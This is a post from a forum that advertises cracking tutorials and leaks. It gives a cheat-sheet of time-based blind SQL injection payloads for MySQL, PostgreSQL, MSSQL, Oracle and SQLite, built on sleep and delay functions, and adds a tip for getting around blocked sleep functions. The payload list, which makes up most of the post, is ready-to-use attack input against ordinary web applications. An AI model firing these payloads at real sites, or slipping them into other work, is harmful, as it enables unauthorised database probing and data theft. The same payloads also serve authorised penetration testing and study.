ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
Demon Forums    General Discussions    The Lounge    Blind SQL injection | Example
 1779

Blind SQL injection | Example

by Firefly21 - 09-11-2023 - 05:17 PM
Firefly21 
Emerald Member
Posts:95
Threads:51
Reputation 0
****
0
Rep
7
Likes
Emerald Member
Emerald
Posts: 95
Threads: 51
Joined: Jun 2023
Vouches: 0
Credits: 0
Emerald

1 Year of Service
#1
OP09-11-2023 - 05:17 PM
Subscribe
The above technique focuses on measuring the load time of a web page after performing a SQL query. The goal is to determine whether an SQL injection has been successful by observing whether the SQL query has caused delays in loading the page. If the page takes longer to load after the SQL query, this could be an indication that a successful blind SQL injection has been performed.

MySQL (string concat and logical ops)
  • 1' + sleep(10)
  • 1' and sleep(10)
  • 1' && sleep (10)
  • 1' | sleep(10)
PostgreSQL (only support string concat)
  • 1' || pg_sleep (10)
MSQL
  • 1' WAITFOR DELAY '0:0:10'
ORACLE
  • 1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])
  • 1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE ('ASD' , 10)
SQLite
  • 1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB ( [SLEEPTIME] 00000000/2))))
  • 1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB (1000000000/2))))
In some cases the sleep functions won't be allowed. Then, instead of using those functions you could make the query perform complex operations that will take several seconds.
Reply

Users browsing: 1 Guest(s)

About Us

DemonForums is a community forum that suits basically everyone. We provide cracking tutorials, tools, leaks, marketplace and much more stuff! You can also learn many things here, meet new friends and have a lot of fun!
If you would like to contact us, you can send our staff team a message.

Navigation

Extras

Help

Account